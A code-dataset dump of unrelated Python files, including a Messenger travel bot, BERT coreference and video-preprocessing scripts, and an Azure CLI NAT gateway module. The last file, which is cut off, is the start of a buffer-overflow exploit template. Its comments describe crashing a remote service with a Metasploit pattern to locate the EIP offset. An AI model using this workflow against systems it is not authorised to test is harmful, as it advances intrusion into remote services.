os.getenv('PAGE_ACCESS_TOKEN')\n\ndata = {}\nwith open('assets/data.json') as json_file:\n data = json.load(json_file)\n\nbot_flow_counter = 0\nbot_flow = [\n 
{\n 'question': 'Hello 👋, {}, I am Cari your CariTravel bot, here to help you choose the right destination 🙂.',\n 'response': None,\n },\n {\n 'question': 'Let us begin!. Would you prefer to set some parameters or roll the dice?',\n 'payload': '1',\n 'response': [\n 'Set Parameters.',\n 'Roll dice.'\n ],\n },\n {\n 'question': 'Let me know what type of vacation it is.',\n 'payload': '2',\n 'response': [\n 'Family',\n 'Couples/Honeymoon',\n 'Friends',\n 'Single'\n ],\n },\n {\n 'question': 'What\\'s your favorite things to do on vacation? Are you into...',\n 'payload': '3',\n 'response': [\n 'Adventure',\n 'Food Experience',\n 'Beaches/Rivers', \n 'Culture',\n ],\n },\n {\n 'question': 'Are you or anybody in your group disabled in anyway?',\n 'payload': '4',\n 'response': [\n 'Yes',\n 'No',\n ],\n },\n {\n 'question': 'Are you interested in places with native languages outside your own?',\n 'payload': '5',\n 'response': [\n 'Yes',\n 'No',\n ],\n },\n]\n\n\ndef handleMessage(sender_psid, received_message):\n print('handleMessage')\n response = {}\n \n if ('quick_reply' in received_message.keys()):\n payload = received_message['quick_reply']['payload']\n response_message = received_message['text']\n if payload == bot_flow[1]['payload']:\n if(response_message == bot_flow[1]['response'][0]):\n response = postback_button_response(bot_flow[2]['question'], bot_flow[2]['payload'], bot_flow[2]['response'])\n elif(response_message == bot_flow[1]['response'][1]):\n response = {\n \"attachment\": {\n \"type\":\"template\",\n \"payload\": {\n \"template_type\":\"generic\",\n \"elements\":[\n {\n \"title\":\"Holiday Inn Resort Montego Bay\",\n \"image_url\":\"https://ihg.scene7.com/is/image/ihg/holiday-inn-resort-montego-bay-4130892904-16x5\",\n \"subtitle\":\"Jamaica\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://via.placeholder.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n 
\"type\":\"web_url\",\n \"url\":\"https://www.ihg.com/holidayinnresorts/hotels/us/en/montego-bay/mbjrh/hoteldetail?cm_mmc=GoogleMaps-_-RS-_-JM-_-MBJRH\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Sheraton Santo Domingo Hotel\",\n \"image_url\":\"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"subtitle\":\"Dominican Republic\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.marriott.com/hotels/travel/sdqds-sheraton-santo-domingo-hotel/?scid=bb1a189a-fec3-4d19-a255-54ba596febe2&y_source=1_Mjg2ODk3OC03MTUtbG9jYXRpb24uZ29vZ2xlX3dlYnNpdGVfb3ZlcnJpZGU=\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Kalinago Beach Resort\",\n \"image_url\":\"https://kalinagobeachresort.com/wp-content/uploads/2015/08/resort.jpg\",\n \"subtitle\":\"Grenada\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://kalinagobeachresort.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://kalinagobeachresort.com/\",\n \"title\":\"Check it out\"\n }\n ] \n }\n ],\n }\n }\n }\n\n elif payload == bot_flow[2]['payload']:\n response = postback_button_response(bot_flow[3]['question'], bot_flow[3]['payload'], bot_flow[3]['response'])\n\n elif payload == bot_flow[3]['payload']:\n response = postback_button_response(bot_flow[4]['question'], bot_flow[4]['payload'], bot_flow[4]['response'])\n \n elif payload == bot_flow[4]['payload']:\n response = postback_button_response(bot_flow[5]['question'], bot_flow[5]['payload'], bot_flow[5]['response'])\n\n elif 
payload == bot_flow[5]['payload']:\n response = {\n \"attachment\": {\n \"type\":\"template\",\n \"payload\": {\n \"template_type\":\"generic\",\n \"elements\":[\n {\n \"title\":\"Holiday Inn Resort Montego Bay\",\n \"image_url\":\"https://ihg.scene7.com/is/image/ihg/holiday-inn-resort-montego-bay-4130892904-16x5\",\n \"subtitle\":\"Jamaica\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://via.placeholder.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.ihg.com/holidayinnresorts/hotels/us/en/montego-bay/mbjrh/hoteldetail?cm_mmc=GoogleMaps-_-RS-_-JM-_-MBJRH\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Sheraton Santo Domingo Hotel\",\n \"image_url\":\"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"subtitle\":\"Dominican Republic\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.marriott.com/hotels/travel/sdqds-sheraton-santo-domingo-hotel/?scid=bb1a189a-fec3-4d19-a255-54ba596febe2&y_source=1_Mjg2ODk3OC03MTUtbG9jYXRpb24uZ29vZ2xlX3dlYnNpdGVfb3ZlcnJpZGU=\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Kalinago Beach Resort\",\n \"image_url\":\"https://kalinagobeachresort.com/wp-content/uploads/2015/08/resort.jpg\",\n \"subtitle\":\"Grenada\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://kalinagobeachresort.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n 
\"url\":\"https://kalinagobeachresort.com/\",\n \"title\":\"Check it out\"\n }\n ] \n }\n ],\n }\n }\n }\n callSendAPI(sender_psid, response)\n return\n\n # Checks if the message contains text\n if ('text' in received_message.keys()):\n # if received_message['text'].lower() == 'get started'.lower() or received_message['text'] != \"\":\n try:\n first_name = retrieve_user_information(sender_psid)['first_name']\n except:\n first_name = ''\n\n # Send Intro response message\n response = {\n \"text\": bot_flow[0]['question'].format(first_name)\n }\n callSendAPI(sender_psid, response)\n\n # Send Intro response message\n response = postback_button_response(bot_flow[1]['question'], bot_flow[1]['payload'], bot_flow[1]['response'])\n callSendAPI(sender_psid, response)\n return\n\n \ndef handlePostback(sender_psid, received_postback):\n print('handlePostback')\n response = {}\n \n # Get the payload for the postback\n payload = received_postback['payload']\n print(payload)\n callSendAPI(sender_psid, response)\n\n\ndef postback_button_response(text, payload, titles):\n\n quick_replies = []\n for title in titles:\n quick_replies.append({\n 'content_type': 'text',\n 'title': title,\n 'payload' : payload,\n })\n\n return {\n 'text': text,\n 'quick_replies': quick_replies\n }\n\ndef sender_action(sender_action):\n # Construct the message body\n request_body = {\n \"sender_action\": sender_action\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n \n\ndef get_started():\n # Construct the message body\n request_body = {\n \"get_started\": 
{\"payload\": \"\"}\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n\ndef retrieve_user_information(sender_psid):\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.get(\"https://graph.facebook.com/{}?fields=first_name,last_name,profile_pic&access_token={}\".format(sender_psid, PAGE_ACCESS_TOKEN))\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n\n return json.loads(response.content)\n except requests.HTTPError as http_err:\n pass\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n\n\ndef callSendAPI(sender_psid, response, sender_action = None):\n # Construct the message body\n request_body = {\n \"recipient\": {\n \"id\": sender_psid\n },\n \"message\": response,\n \"sender_action\": sender_action\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n \n\n@app.route(\"/webhook\", methods=['GET','POST'])\ndef listen():\n if request.method == 'POST':\n \n # Parse the request body from the 
POST\n body = request.json\n\n # Check the webhook event is from a page subscription\n if (body['object'] == 'page'):\n for entry in body['entry']:\n\n # Gets the body of the webhook event\n webhook_event = entry['messaging'][0]\n # print('webhook_event:', webhook_event)\n\n # Get the sender PSID\n sender_psid = webhook_event['sender']['id']\n # print('sender_psid:', sender_psid)\n \n if ('message' in webhook_event.keys()):\n handleMessage(sender_psid, webhook_event['message'])\n elif ('postback' in webhook_event.keys()):\n handlePostback(sender_psid, webhook_event['postback'])\n return 'EVENT_RECEIVED', 200\n else:\n return '', 404\n\n if request.method == 'GET':\n # Parse params from the webhook verification request\n mode = request.args.get('hub.mode')\n token = request.args.get('hub.verify_token')\n challenge = request.args.get('hub.challenge')\n \n # Check if a token and mode were sent\n if (mode and token):\n\n # Check if the mode and token sent are correct\n if(mode == 'subscribe' and token == VERIFY_TOKEN):\n print('WEBHOOK_VERIFIED')\n return challenge, 200\n else:\n return '', 403\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590319198","text":"import numpy as np\nimport sys\nimport cv2\nimport os\nimport random\nfrom sklearn.model_selection import train_test_split\n\n\ndef getListOfFiles(dirName):\n # create a list of file and sub directories \n # names in the given directory \n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory \n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n return allFiles\ndef 
getFrames(fileN, aug):\n framelist= []\n video = cv2.VideoCapture(fileN)\n while True:\n done, frame = video.read()\n if int(video.get(cv2.CAP_PROP_POS_FRAMES)) % frames != 0:\n continue\n if not done:\n video.release()\n break\n if aug:\n frame = cv2.flip(frame, 1)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (int(1280/divisor), int(720/divisor)))\n frameList.append(frame)\n return frameList\n \n\nif __name__ == \"__main__\":\n size =1282\n frames = 2\n divisor = 8\n aug = True\n \n name = getListOfFiles(sys.argv[1])\n #Shuffle images so positive and negative are next to each other\n random.shuffle(name)\n name.sort();\n x=[]\n y=[]\n for i, fileN in enumerate(name):\n print(i)\n #process frames in a video\n frameList = getFrames(fileN, False)\n x.append(frameList)\n #data augmentation\n if aug:\n frameList = getFrames(fileN, True)\n x.append(frameList)\n tempName = fileN.split(\"/\")\n if tempName[-2] == \"positive\":\n y.append(1)\n if aug:\n y.append(1)\n \n else:\n y.append(0)\n if aug:\n y.append(0)\n #print(x.shape)\n x, x_val, y, y_val = train_test_split(x, y, test_size=.1)\n np.save('x', x)\n #if one channel use this format for x and x_val\n #x = x[:, :, :, :, np.newaxis]\n x_val = np.load('x_val.npy')\n np.save('x_val', x_val)\n np.save('y', y)\n np.save('y_val', y_val)\n","sub_path":"video_process.py","file_name":"video_process.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172177005","text":"import numpy as np\nimport pandas as pd \nimport os\nimport gc\nimport zipfile\nfrom tqdm import tqdm\nimport re\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import log_loss\n\nimport modeling\nimport extract_features\nimport tokenization\n\nval_df = pd.read_table('gap-validation.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\ntest_df = 
pd.read_table('gap-validation.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\ndev_df = pd.read_table('gap-development.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\n\ndef get_features(df):\n\n df['section_min'] = df[['Pronoun-offset', 'A-offset', 'B-offset']].min(axis=1)\n df['Pronoun-offset2'] = df['Pronoun-offset'] + df['Pronoun'].map(len)\n df['A-offset2'] = df['A-offset'] + df['A_Noun'].map(len)\n df['B-offset2'] = df['B-offset'] + df['B_Noun'].map(len) \n df['section_max'] = df[['Pronoun-offset2', 'A-offset2', 'B-offset2']].max(axis=1)\n df['A-dist'] = (df['Pronoun-offset'] - df['A-offset']).abs()\n df['B-dist'] = (df['Pronoun-offset'] - df['B-offset']).abs()\n df['number_of_chars'] = df['Text'].apply(lambda x : len(str(x)))\n df['Number_of_words'] = df['Text'].apply(lambda x : len(x.split()))\n df['unique_number_of_words'] = df['Text'].apply(lambda x : len(set(x.split())))\n # df[\"number_of_stopwords\"] = df[\"Text\"].apply(lambda x: len([w for w in str(x).lower().split() if w in stop]))\n # df[\"number_of_punctuations\"] = df['Text'].apply(lambda x: len([c for c in str(x) if c in string.punctuation]))\n df['upper'] = df['Text'].apply(lambda x : len([w for w in str(x).split() if str(w).isupper() ]))\n df['lower'] = df['Text'].apply(lambda x : len([w for w in str(x).split() if str(w).islower() ]))\n df['A-dist-abs'] = (df['Pronoun-offset'] - df['A-offset']).abs()\n df['B-dist-abs'] = (df['Pronoun-offset'] - df['B-offset']).abs()\n return df\n\nval_df = get_features(val_df)\ntest_df = get_features(test_df)\ndev_df = get_features(dev_df)\n\nwith zipfile.ZipFile(\"uncased_L-12_H-768_A-12.zip\", \"r\") as zip_ref:\n zip_ref.extractall()\n\ndef count_char(text, offset): \n count = 0\n for pos in range(offset):\n if text[pos] != \" \": count +=1\n return count\n\ndef candidate_length(candidate):\n count = 0\n for i in range(len(candidate)):\n if candidate[i] 
!= \" \": count += 1\n return count\n\ndef count_token_length_special(token):\n count = 0\n special_token = [\"#\", \" \"]\n for i in range(len(token)):\n if token[i] not in special_token: count+=1\n return count\n\ndef embed_by_bert(df):\n\n text = df['Text']\n text.to_csv('input.txt', index=False, header=False)\n os.system(\"python3 extract_features.py \\\n --input_file=input.txt \\\n --output_file=output.jsonl \\\n --vocab_file=uncased_L-12_H-768_A-12/vocab.txt \\\n --bert_config_file=uncased_L-12_H-768_A-12/bert_config.json \\\n --init_checkpoint=uncased_L-12_H-768_A-12/bert_model.ckpt \\\n --layers=-1 \\\n --max_seq_length=256 \\\n --batch_size=8\")\n \n bert_output = pd.read_json(\"output.jsonl\", lines = True)\n bert_output.head()\n \n os.system(\"rm input.txt\")\n os.system(\"rm output.jsonl\")\n \n index = df.index\n columns = [\"emb_A\", \"emb_B\", \"emb_P\", \"label\"]\n emb = pd.DataFrame(index = index, columns = columns)\n emb.index.name = \"ID\"\n \n for i in tqdm(range(len(text))):\n \n features = bert_output.loc[i, \"features\"]\n P_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'Pronoun-offset'])\n A_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'A-offset'])\n B_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'B-offset'])\n A_length = candidate_length(df.loc[i, 'A_Noun'])\n B_length = candidate_length(df.loc[i, 'B_Noun'])\n \n emb_A = np.zeros(768)\n emb_B = np.zeros(768)\n emb_P = np.zeros(768)\n \n char_count = 0\n cnt_A, cnt_B = 0, 0\n \n for j in range(2, len(features)):\n token = features[j][\"token\"]\n token_length = count_token_length_special(token)\n if char_count == P_char_start:\n emb_P += np.asarray(features[j][\"layers\"][0]['values']) \n if char_count in range(A_char_start, A_char_start+A_length):\n emb_A += np.asarray(features[j][\"layers\"][0]['values'])\n cnt_A += 1\n if char_count in range(B_char_start, B_char_start+B_length):\n emb_B += np.asarray(features[j][\"layers\"][0]['values'])\n cnt_B += 1 \n char_count 
+= token_length\n \n emb_A /= cnt_A\n emb_B /= cnt_B\n \n label = \"Neither\"\n if (df.loc[i,\"A-coref\"] == True):\n label = \"A\"\n if (df.loc[i,\"B-coref\"] == True):\n label = \"B\"\n\n emb.iloc[i] = [emb_A, emb_B, emb_P, label]\n \n return emb\n\n# %%time\nval_bert_emb = embed_by_bert(val_df)\ntest_bert_emb = embed_by_bert(test_df)\ndev_bert_emb = embed_by_bert(dev_df)\n\ndef featurize(embedding_df):\n \n pronoun_embs, a_embs, b_embs, labels = [], [], [], []\n \n for i in tqdm(range(len(embedding_df))):\n \n pronoun_embs.append(embedding_df.loc[i, \"emb_P\"])\n a_embs.append(embedding_df.loc[i, \"emb_A\"])\n b_embs.append(embedding_df.loc[i, \"emb_B\"])\n\n label_map = {'A': 0, 'B': 1, 'Neither': 2}\n labels.append(label_map[embedding_df.loc[i, \"label\"]])\n\n \n a_embs, b_embs, = np.asarray(a_embs).astype('float'), np.asarray(b_embs).astype('float'), \n pronoun_embs = np.asarray(pronoun_embs).astype('float')\n a_embs[np.isnan(a_embs)] = 0\n b_embs[np.isnan(b_embs)] = 0\n pronoun_embs[np.isnan(pronoun_embs)] = 0\n \n return np.concatenate([a_embs, b_embs, pronoun_embs], axis=1), np.asarray(labels)\n\nX_train, y_train = featurize(pd.concat([val_bert_emb, dev_bert_emb]).sort_index().reset_index())\n\nprint(X_train.shape, y_train.shape)\n\nfrom sklearn import linear_model\n\nlogit = LogisticRegression(C=1, random_state=23, solver='lbfgs', multi_class='multinomial', max_iter=300, n_jobs=8)\n\n# %%time\nlogit.fit(X_train, y_train)\n\n\"\"\"## Prediction for stage 1 test set\"\"\"\n\n#!cp gap-development.tsv stage1_test.tsv\n\nstage1_test_df = pd.read_table('test_stage_2.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\n\nstage1_test_df = get_features(stage1_test_df)\n\nstage1_test_bert_emb = embed_by_bert(stage1_test_df)\n\nX_test, y_test = featurize(stage1_test_bert_emb)\n\nlogit_test_pred = logit.predict_proba(X_test)\nprint(log_loss(y_test, logit_test_pred))\n\nsubmission = 
pd.read_csv(\"sample_submission_stage_2.csv\", index_col = \"ID\")\nsubmission[\"A\"] = logit_test_pred[:,0]\nsubmission[\"B\"] = logit_test_pred[:,1]\nsubmission[\"NEITHER\"] = logit_test_pred[:,2]\nsubmission.to_csv(\"submission.csv\")\n","sub_path":"GAP/logistic_regression_on_bert.py","file_name":"logistic_regression_on_bert.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635166009","text":"\nimport threading\nimport time\n \n# 定义一个全局变量\n#number = 0\nlist1=[\n {\n \"code\":\"false\",\n \"id\":\"123\",\n \"name\":\"黄同学\"\n },{\n \"code\":\"false\",\n \"id\":\"456\",\n \"name\":\"张大\"\n },{\n \"code\":\"false\",\n \"id\":\"789\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1011\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1112\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1213\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1314\",\n \"name\":\"李工\"\n }\n]\nmutex = threading.Lock()\nDATA=[]\n'''创建一个互斥锁,默认是没有上锁的'''\ndef test1():\n global DATA\n '''上锁'''\n \n while True:\n for i in list1: \n #mutex.acquire() \n DATA.append(i)\n # if i==50:\n # print(\"第50位学生被卡在这里3秒\")\n # time.sleep(30)\n \n #print(\"number\",DATA) \n # DATA.append(i)\n # DATA.append(i)\n #mutex.release()\n #print(\"number\",DATA) \n time.sleep(10)\n \n # for i in range(temp):\n # number += 1\n '''解锁'''\n \n #print(\"-----in test1 number=%s-----\" % number)\n \ndef test2():\n global DATA\n '''上锁'''\n \n while True: \n if DATA:\n for i in DATA:\n mutex.acquire()\n #print(\"data[0]\",DATA[0])\n if DATA[0][\"code\"]==\"true\":\n print(\"该学生请假了\",DATA[0])\n if DATA[0][\"code\"]==\"false\":\n print(\"该学生没请假\",DATA[0])\n DATA.remove(DATA[0])\n mutex.release()\n print(\"number1\",DATA)\n \n # for i in number:\n # number.remove(i) \n #time.sleep(5)\n # for i in range(temp):\n # number += 1\n '''解锁'''\n \n #print(\"-----in test2 number=%s-----\" % 
number)\ndef test3():\n global list1\n time.sleep(15)\n print(\"开始运行\")\n list1[1][\"code\"]=\"true\"\ndef main():\n \n t1 = threading.Thread(target=test1) # 加上要传递的参数,元组类型\n t2 = threading.Thread(target=test2)\n t3 = threading.Thread(target=test1)\n t1.start()\n t2.start()\n #t3.start()\n \n #time.sleep(2)\n \n #print(\"-----in main number=%s-----\"% number)\n \nif __name__ == '__main__':\n main()\n'''\n旧的方案DATA数据堆积没有删除\n\n实现思路\n一个线程:学校每60s检测一次append到DATA中\n一个线程:一直循环DATA数据,删掉第一个\n问题:有可能DATA数据太多导致另一个线程还没有删完\n来了很多数据,造成不是实时或者延迟\n数据量小的时候不易察觉\n\n一个线程访问5000个同学假如某个学生卡在那里了\n假如这个线程append加了锁,比如第2000名学生卡在那里,append到DATA里,\n他会一直等到那个学生请求成功才会执行别的线程,所以append时候不加锁,\n别的线程要想一直删除DATA里的数据,会因为这第2000名学生,删除不掉前1999名学生\n\n好的解决方案\n#三个线程\n向学校的接口请求,学校有多少个学生,然后每个学生判断是否请假,然后再推送机器里比如耗时90s,可以缩短为30s\n1.请求学校有多少个学生\n2.那个学生是否请假\n3.那个学生是要添加的还是删除的\n'''\n\n","sub_path":"MQ1/后期优化/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"279466685","text":"def minus26(idx):\n while idx >= 26:\n idx = idx - 26\n return idx\n \nN = int(input())\nS = list(input())\n\nalphabet = ['A', 'B', 'C', 'D', 'E', 'F',\n 'G', 'H', 'I', 'J', 'K', 'L',\n 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\nS_idx = [alphabet.index(s)+N for s in S] \nS_idx = [minus26(idx) for idx in S_idx]\nprint(''.join([alphabet[idx] for idx in S_idx]))\n","sub_path":"ABC146B.py","file_name":"ABC146B.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62364563","text":"import datetime\nimport tkinter\nimport queue\n\nmytempo = 0\nque = queue.Queue(4)\n\ndef page1_tempo():\n global mytempo\n current_time = datetime.datetime.now()\n current_time = str(current_time).split()[1].split(':')\n minute = int(current_time[1])\n second = float(current_time[2])\n time_for_tempo = minute * 60 + second\n\n if 
que.qsize() < 3:\n que.put(time_for_tempo)\n else:\n mytempo = int(60 * 4 / (time_for_tempo - que.get()))\n que.put(time_for_tempo)\n\n catch_tempo.configure(text=mytempo)\n\n\ndef page1():\n tempo_button = tkinter.Button(window, text=\"tempo\", height=10, width=33, command=page1_tempo)\n tempo_button.grid(row=1, column=2)\n window.mainloop()\n\nwindow = tkinter.Tk()\nwindow.title(\"Time_Table\")\nwindow.geometry(\"1285x673+100+10\")\nwindow.resizable(False, False)\n\ncatch_tempo = tkinter.Button(window, text=mytempo, height=10, width=33)\ncatch_tempo.grid(row=2, column=3)\npage1()","sub_path":"oldfiles/find_tempo.py","file_name":"find_tempo.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"404117498","text":"# -*- coding:utf-8 -*-\n# @Time: 2020/7/11 8:10 上午\n# @Author: duiya duiyady@163.com\n\n\n\"\"\"\n给定一个整数数组 nums,按要求返回一个新数组 counts。数组 counts 有该性质: counts[i] 的值是  nums[i] 右侧小于 nums[i] 的元素的数量。\n示例:\n输入: [5,2,6,1]\n输出: [2,1,1,0]\n解释:\n5 的右侧有 2 个更小的元素 (2 和 1).\n2 的右侧仅有 1 个更小的元素 (1).\n6 的右侧有 1 个更小的元素 (1).\n1 的右侧有 0 个更小的元素.\n\"\"\"\n\n# 时间复杂度太高\ndef countSmaller(nums):\n if len(nums) == 0:\n return\n tmp_nums = sorted(set(nums))\n tmp_count = [0] * len(tmp_nums)\n result = [0]*len(nums)\n index = {tmp_nums[i]: i for i in range(len(tmp_nums))}\n for i in reversed(range(len(nums))):\n result[i] = sum(tmp_count[: index[nums[i]]])\n tmp_count[index[nums[i]]] += 1\n return result\n\n\nif __name__ == '__main__':\n print(countSmaller([5,2,6,1, 0]))\n\n\n\n","sub_path":"src/main/num301_400/315_计算右侧小于当前元素的个数.py","file_name":"315_计算右侧小于当前元素的个数.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135022168","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core.util import sdk_no_wait\n\nfrom knack.log import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef network_client_factory(cli_ctx, **kwargs):\n from azure.cli.core.profiles import ResourceType\n from azure.cli.core.commands.client_factory import get_mgmt_service_client\n return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK, **kwargs)\n\n\ndef create_nat_gateway(cmd, nat_gateway_name, resource_group_name,\n location=None, public_ip_addresses=None,\n public_ip_prefixes=None, idle_timeout=None, zone=None, no_wait=False):\n\n client = network_client_factory(cmd.cli_ctx).nat_gateways\n NatGateway, NatGatewaySku = cmd.get_models('NatGateway', 'NatGatewaySku')\n\n nat_gateway = NatGateway(name=nat_gateway_name,\n location=location,\n sku=NatGatewaySku(name='Standard'),\n idle_timeout_in_minutes=idle_timeout,\n zones=zone,\n public_ip_addresses=public_ip_addresses,\n public_ip_prefixes=public_ip_prefixes)\n\n return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, nat_gateway_name, nat_gateway)\n\n\ndef update_nat_gateway(instance, cmd, public_ip_addresses=None,\n public_ip_prefixes=None, idle_timeout=None):\n\n with cmd.update_context(instance) as c:\n c.set_param('idle_timeout_in_minutes', idle_timeout)\n if public_ip_addresses is not None:\n c.set_param('public_ip_addresses', public_ip_addresses)\n if public_ip_prefixes is not None:\n c.set_param('public_ip_prefixes', public_ip_prefixes)\n return instance\n\n\ndef list_nat_gateway(cmd, resource_group_name=None):\n client = network_client_factory(cmd.cli_ctx).nat_gateways\n if resource_group_name:\n return client.list(resource_group_name)\n return 
client.list_all()\n","sub_path":"src/azure-cli/azure/cli/command_modules/natgateway/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621988801","text":"#!/usr/bin/env python3\nimport socket, time, sys\n\n# NOTE: This template used https://www.exploit-db.com/exploits/1582 as the example\n# IMPORTANT: Dont forget to set up l_bytes\n\n# Phase 2: Find the offset of EIP at the time of the crash\n\n# ------------------------------------------------------------------\n# How do we find the offset?\n# ------------------------------------------------------------------\n# Use pattern_create to create pattern to inject\n# /usr/bin/msf-pattern_create -l \n# Crash the service with this payload and note value of EIP\n# Use pattern_offset to find offset of EIP from beginning of injection\n# /usr/bin/msf-pattern_offset -q \n#\n# Example:\n# /usr/bin/msf-pattern_create -l 4379 > /tmp/pattern\n# python3 2-find-eip-offset.py 192.168.56.32 13327 /tmp/pattern\n\nif len(sys.argv) != 4:\n print()\n print(\"Usage: {} \".format(sys.argv[0]))\n print(\"\\ttarget ip: Remote hostname or IP address of target service\")\n print(\"\\ttarget port: Remote port of target sevice\")\n print(\"\\tpattern file location: Location of file created with msf-pattern_create\")\n exit(0)\n\n# sys.argv is the list of command line arguments\nRHOST = 1\nRPORT = 2\nPATTERN_FILE_LOCATION = 3\n\nl_rhost: str = sys.argv[RHOST]\nl_rport: int = int(sys.argv[RPORT])\nl_pattern_file_location: str = 